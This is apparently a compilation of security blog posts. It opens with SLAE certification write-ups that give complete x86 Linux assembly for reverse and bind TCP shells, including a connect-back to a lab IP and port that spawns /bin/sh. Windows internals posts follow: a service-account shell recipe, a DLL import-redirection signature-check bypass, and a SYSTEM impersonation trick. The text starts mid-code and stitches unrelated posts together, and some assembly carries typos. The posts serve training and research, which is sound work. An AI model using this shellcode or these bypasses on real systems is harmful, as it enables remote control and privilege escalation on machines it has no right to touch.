               mov bl, 0x1             ;net.h SYS_SOCKET 1 (0x1)
               xor ecx, ecx            ;remove x00/NULL byte
              mov ecx, esp            ;arg to SYS_SOCKET
              int 0x80                ;interrupt/execute


              mov edi, eax            ;sockfd, store return value of eax into edi


0x2 - connect

Once our socket is set-up, the next step is to invoke the connect() system call. This will be used to connect back to the listening machine, through the socket using an IP address and Port destination.

Below shows what we need for the connect():



One main difference with reverse shell vs. a bind shell is that we need both the IP and port of the listening machine for the reverse shell. Specifically, we use 192.168.199.128 and port 4445 as the IP and port respectively. We load both the IP and port address into the stack using jmp-pop-call method again. We first do a jmp to the label that contains our IP and port. '192.168.199.1304445' is then loaded to the stack once the call command is called. We can then call the pop esi instruction which loads the '192.168.199.1304445' into the esi register. Finally, to split the IP and port we do a push dword[esi] which pushes the first 4 bytes (192.168.199.130) and then a push word[esi +4] which pushes the last two bytes (4445).

We then call the socketcall() and SYS_CONNECT.


   reverse_jump:

        jmp short reverse_ip_port


    connect:

        ;int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen$


        pop esi                            ;pops port+IP (total of 6 bytes), ESP addr to e$
        xor eax, eax                    ;removes x00/NULL byte
        xor ecx, ecx                     ;removes x00/NULL byte
        push dword[esi]              ;push IP (first 4 bytes of esi)
        push word[esi +4]           ;push PORT (last 2 bytes of esi)
        mov al, 0x2                      ;AF_INET IPV4
        push ax
        mov eax, esp                    ;store stack address into edc (struct sockaddr)
        push 0x10                        ;store length addr on stack
        push eax                          ;push struct sockaddr to the stack
        push edi                           ;sockfd from th eax _start
        xor eax, eax                     ;removes x00/NULL byte
        mov al, 0x66                    ;syscall 102 for socketcall
        xor ebx, ebx                     ;removes x00/NULL byte
        mov bl, 0x03                    ;net.h SYS_CONNECT 3
        mov ecx, esp                    ;arg for SYS_CONNECT
        int 0x80



    reverse_ip_port:

        call connect

        reverse_ip dd 0x82c7a8c0       ;192.168.199.130, hex in little endian
        reverse_port dw 0x5d11          ;port 4445, hex in little endian



0x3 - execve

Before execve() syscall can be invoked, we have to set up dup2() calls to ensure all the std in/out/error goes through the socket. We use the same technique utilized in assignment #1.

   change_fd:

        ;multiple dup2() to ensure that stdin, stdout, std error will
        ;go through the socket connection

        xor ecx, ecx            ;removes 0x00/NULL byte, 0 (std in)
        xor eax, eax            ;removes 0x00/NULL byte
        xor ebx, ebx            ;removes 0x00/NULL byte
        mov ebx, edi            ;sockfd from the eax _start
        mov al, 0x3f            ;syscall 63 for dup2
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to cx, 1 (std out)
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to ecx, 2 (std error)
        int 0x80                ;interrupt/execute


Shell time! Shells for everyone!

This is no different than assignment #1 shell. We use execve() syscall to invoke a /bin/sh, however this time it sends the file std in/out back to the listening machine.

  execve:
         xor eax, eax             ;removes x00/NULL byte
         push eax                   ;push first null dword

         push 0x68732f2f      ;hs//
         push 0x6e69622f      ;nib/

         mov ebx, esp             ;save stack pointer in ebx

         push eax                    ;push null byte terminator
         mov edx, esp             ;moves address of 0x00hs//nib/ into edx

         push ebx                    
         mov ecx, esp          

         mov al, 0xb                ;syscall 11 for execve
         int 0x80


Testing our reverse shell

First, we start with compiling our nasm file into executable and then opening up a listener in our Kali box.




Execute the file and we get a reverse TCP connection back to our kali


SUCCESS...our reverse shell works.


We then use objdump to get our actual shellcode...


Copy the shellcode into our c file, test reverse shell again and we get another successful reverse shell to the kali listener.








SLAE Certification

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

~~~~~~~~~//*****//~~~~~~~~~

I started my offsec journey back in Feb 2007 when I registered for Offensive Security Certified Professional (OSCP) and completed the certification in June of that same year. Almost 3 years later, I finally decided to start on Offensive Security Certified Expert (OSCE) and one of the baseline requirements for this certification is a familiarity with Linux assembly language. Several OSCE preparation/exam reviews pointed to Security Tubes Linux Assembly (SLAE-32 bit) course as a good course to prepare for OSCE. The course is provided at an affordable price of $130 and the certification is really unique. After completing the course, students are required to complete seven assignments (listed below) to obtain the certification.

SLAE Assignment #1 - Bind TCP Shell
SLAE Assignment #2 - Reverse TCP Shell
SLAE Assignment #3 - Egg Hunter
SLAE Assignment #4 - Encoder
SLAE Assignment #5 - Shellcode Analysis
SLAE Assignment #6 - Polymorphism
SLAE Assignment #7 - Crypter 

Shout out to Vivek for doing an amazing job teaching the course. It was a perfect blend of the crawl, walk, run--from learning the basics of assembly registers to operations/conditions/controls/loops, creating shellcodes, and finally creating encoders/polymorphism/crypters. 

Bind TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517

Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #1 - Create a Shell_BIND_TCP Shellcode

    - Binds to a port
    - Execs Shell on incoming connection
    - Port number should be easily configurable


~~~~~~~~~//*****//~~~~~~~~~



Creating a BIND_TCP shell can be broken down into 4 functions.

0x1 socket
0x2 connect
0x3 execve
0x4 accept
0x5 execve


... let us begin


0x1 - socket

First, we create a socket. socket() requires 3 arguments: domain, type, protocol as seen below.


domain = AF_INET or 0x2


type = SOCK_STREAM or 0x1


protocol = TCP or 0x6


We will also be using this net.h file when we invoke the syscalls which are the networking handling part of the kernel.



We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

               push 0x6
               push 0x1
               push 0x2

Once the socket has been created, we then invoke the socketcall() syscall



             xor eax, eax              ;remove x00/NULL byte
             mov al, 0x66             ;syscall 102 (x66) for socketcall
             xor ebx, ebx             ;remove x00/NULL byte
             mov bl, 0x1              ;net.h SYS_SOCKET 1 (0x1)
             xor ecx, ecx             ;remove x00/NULL byte
            mov ecx, esp             ;arg 2, esp address to ecx
            int 0x80                    ;interrupt/excute

            mov edi, eax             ;sockfd, this will be referenced throughout the 

0x2 -bind

One common concept in SLAE course is the use of JMP-CALL-POP which allows a way to dynamically access addresses. This is because if a call instruction is used, the next instruction is automatically loaded into the stack.



          bind:
                jmp short port_to_blind        

         call_bind:
               pop esi                  ; pops ESP addr
              xor eax, eax          ;remove x00/NULL byte
              push eax               ;push eax NULL value to the stack
              push word[esi]     ;push actual port number to the stac, word=2 bytes
              mov al, 0x2          ;AF_INET IPv4
              push ax
              mov edx, esp        ;store stack addr (struct sockaddr)
              push 0x10            ;store length addr on stack
              push edx              ;push strct sockaddr to the stack
              push edi               ;sockfd from the eax _start
              xor eax, eax         ;remove x00/NULL byte
              mov al, 0x66        ;syscall 102 for socketcall
              mov bl, 0x02        ;net.h SYS_BIND 2 (0x02)
              mov ecx, esp        ;arg for SYS_BIND
              int 0x80               ;interrupt/execute

         port_to_bind:
              call call_bind
              port_number dw 0x5d11  ;port 4445 (0x115d)
                                                        ;this gets pushed to the stack after the call instruction

0x3 - listen


The listen() syscall is pretty straightforward.


            push 0x1                         ; int backlog
            push edi                          ; sockfd from eax _start
           xor eax, eax                    ;remove x00/NULL byte
           mov al, 0x66                   ;syscall 102 for socketcal
           xor ebx, ebx                    ;remove x00/NULL byte
          mov bl, 0x4                      ;net.h SYS_LISTEN 4
          xor ecx, ecx                     ;remove x00/NULL byte
          mov ecx, esp                    ;arg for SYS_LISTEN
          int 0x80                           ;interrupt/execute

0x4 - accept

Likewise, accept() is pretty straight forward.



             xor ear, eax                  ;remove x00/NULL byte
             push eax                       ;push NULL value to addrlen
             xor ebx, ebx                 ;remove x00/NULL byte
            push ebx                       ;push NULL value to addr
            push edi                        ;sockfd from eax _start
            mov al, 0x66                 ;syscall 102 for socketcall
            mov bl, 0x5                   ;net.h SYS_ACCEPT 5
            xor ecx, ecx                  ;remove x00/NULL byte
            mov ecx, esp                 ;arg for SYS_ACCEPT
            int 0x80                         ;interrupt/execute

0x4a - change_fd


This is all the dup2() functions which ensure file /bin/sh goes through the socket connection

       
            mov ebx, eax                  ;moves fd from accept to ebx
            xor ecx, ecx                    ;removes 0x00/NULL byte, 0 (std in)
            xor eax, eax                   ;removes 0x00/NULL byte
            mov al, 0x3f                  ;syscall 63 for dup2
            int 0x80                         ;interrupt/execute

            mov al,0x3f                   ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 1 (std out)
            int 0x80                         ;interrupt/execute

            mov al, 0x3f                  ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 2 (std error)
            int 0x80                         ;interrupt/execute

0x5 - execve

At this point we have successfully set-up our socket() and we can establish a bind() port, listen() on incoming connections and accept() it. We are now ready to run our execve(). Once the connection is established, execve will be used to execute /bin/sh.


The following instructions are taken directly from the execve module of the SLAE course.

             xor eax, eax                 ;removes x00/NULL byte
             push eax                      ;push first null dword

             push 0x68732f2f          ;hs// 
             push 0x6e69622f          ;nib/

              mov ebx, esp              ;save stack pointer in ebx
             push eax                       ; push null byte as 'null byte terminator'
             mov edx, esp               ;moves address of 0x00hs//nib/ into ecx

             push ebx
             mov exc, esp

             mov al, 0xb                 ; syscall 11 for execve
             int 0x80


And we are done!

Testing our bind shell.

We compile nasm file and execute it.



Then using another machine (Kali), I connect to the ubuntu which spawns /bin/sh shell and we can run commands remotely.

BT IP: 192.168.199.128
Ubuntu IP: 192.168.199.129


We can also run the netstat command in the ubuntu machine to verify the established connection between the BT and Ubuntu machines:

Success..we can see the connection established.


Finally, we use objdump to obtain the shellcode from our executable


***Note the last 2 bytes of the shellcode is the port to bind on. Keeping in mind little-endian structure. We should be able to just change the last 2 bytes of the shellcode to configure a different port to bind on.

Here's an example of using the shellcode with a .c program




We compile shellcode.c, execute it and connect to 4445 from out BT machine.



SUCCESS!






Getting an Interactive Service Account Shell

By: tiraniddo
9 February 2020 at 23:21
Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts, however you'll find it immediately dies:

PS> $p.ExitNtStatus
STATUS_DLL_INIT_FAILED

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whois and showing the use as Local Service.



DLL Import Redirection in Windows 10 1909

By: tiraniddo
8 February 2020 at 16:47
While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interesting was during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
          &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
            LdrpBuildImportRedirection(Dll);
        }
        // ...
    }

}

The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);
    }


    RTL_USER_PROCESS_PARAMETERS Params = {};
    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
    }


    // ...

}

The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
  <xs:complexType>
    <xs:all>
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                  minOccurs="0"/>
    </xs:all>
  </xs:complexType>
</xs:element>

This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;
}


const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
{
    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },
};


extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
{
    CURRENT_IMPORT_REDIRECTION_VERSION,
    ARRAYSIZE(RedirectedFunctions),
    RedirectedFunctions

};

I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it’s allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations, it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your applications dependency graph and doesn’t support GetProcAddress. But you could probably live with that,

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
{
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;

}

If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;

}

The code is using a the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to use the kernel's Code Integrity module to checking the signing level. The signing level must be at least level 8, passing in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

By: tiraniddo
30 January 2020 at 06:40
This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

Impersonation FlowChat. Showing that there's an Origin Session Check.

Actually this diagram isn't exactly like I've shown before I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel call SeTokenCanImpersonate the check looks basically like:

if (proctoken->AuthenticationId == 
    imptoken->OriginatingLogonSession) {
return STATUS_SUCCESS;
}

The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

PS> Start-Win32ChildProcess powershell

Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

PS> $(Get-NtToken -Pseduo).AuthenticationId

LowPart HighPart
------- --------
    999        0

Next remove SeImpersonatePrivilege from the Token:

PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

Now pick a normal user token, say from Explorer and dump the Origin.

PS> $p = Get-NtProcess -Name explorer.exe
PS> $t = Get-NtToken -Process $p -Duplicate
PS> $t.Origin

LowPart HighPart
------- --------
    999        0

As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Impersonation

We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

PS> $t = Get-NtToken -Duplicate
PS> Set-NtTokenIntegrityLevel High
PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Identification

As we can see, the level has been set to Identification. If SeImpersonatePrivilege was being granted we'd have been able to impersonate the higher IL token as the privilege check is before the IL check.

Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if that's been stripped away. This should work even in AppContainers or Restricted as the check for sandbox tokens happens after the session check.

The take away from this blog should be:

  • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
  • Never try create a sandboxed process which uses SYSTEM as the base token as you can probably circumvent all manner of security checks including impersonation.



Uncovering Mimikatz 'msv' and collecting credentials through PyKD

20 January 2020 at 00:00
Preface All the value that a tool such as mimikatz provides in extrapolating Windows credential’s from memory resides in every pentester’s heart and guts. It is so resilient and flexible that it has quickly become the de facto standard in credential dumping and we cannot thank Benjamin Delpy enough for the immense quality work that has been done in recent years. Since the code is open source , I recently decided to take up the not-so-leisurely hobby of understanding the mimikatz codebase.

Dumping DPC Queues: Adventures in HIGH_LEVEL IRQL

17 January 2020 at 23:30
This post is part of the Practical Reverse Engineering Exercises series. To understand more about the basics of DPCs, read Reversing KeInsertQueueDpc (Source code below.) Exercise: Write a driver to enumerate all DPCs on the entire system. Make sure you support multi-processor systems! Explain the difficulties and how you solved them. Sounds fun! let’s start. I thought about dividing this post to 2 posts, but nah Using Undocumented APIs in Windows First of all, we need to understand that accessing the DPC queue from a real product is an extremely bad idea because it’s a pretty undocumented data structure.

Reversing DPC: KeInsertQueueDpc

5 January 2020 at 19:33
Exercise: Explain how the following functions work: KeInsertQueueDpc, KiRetireDpcList, KiExecuteDpc, and KiExecuteAllDpcs. If you feel like an overachiever, decompile those functions from the x86 and x64 assemblies and explain the differences. If I want to explain the complete solution I’ll have to divide this exercise to 2 posts. The first post is pretty simple.. we are going to reverse engineer KeInsertQueueDpc. In future posts we’ll continue exploring DPC and we will write code that dumps the DPC queues.

Empirically Assessing Windows Service Hardening

By: tiraniddo
2 January 2020 at 02:26
In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discovers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS go and fix them silently making it unclear if they care or not.

Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

That's not to say there hasn't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeamIlias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you probably should read up one of the write-ups (NCC one here) but the gist is, the Update Orchestrator Service has a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary giving a direct service to SYSTEM privilege escalation.

That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is, even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference, Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

"Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, the resource being written to might be uninteresting, however as a proxy this is sufficient as the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

WSH Details

Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

Limited Service Accounts and Reduced Privilege

This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts introduction there was only two ways of configuring the user for a system service on Windows, either the fully privileged SYSTEM account or creating a local/domain user which has the "Log on as a Service" right. The two accounts where introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909, they are both assigned the following groups*:

BUILTIN\Users
CONSOLE LOGON
Everyone
LOCAL
NT AUTHORITY\Authenticated Users
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization

* Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:

SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeSystemTimePrivilege†
SeTimeZonePrivilege
SeUndockPrivilege

† NETWORK SERVICE doesn't have SeSystemTimePrivilege.

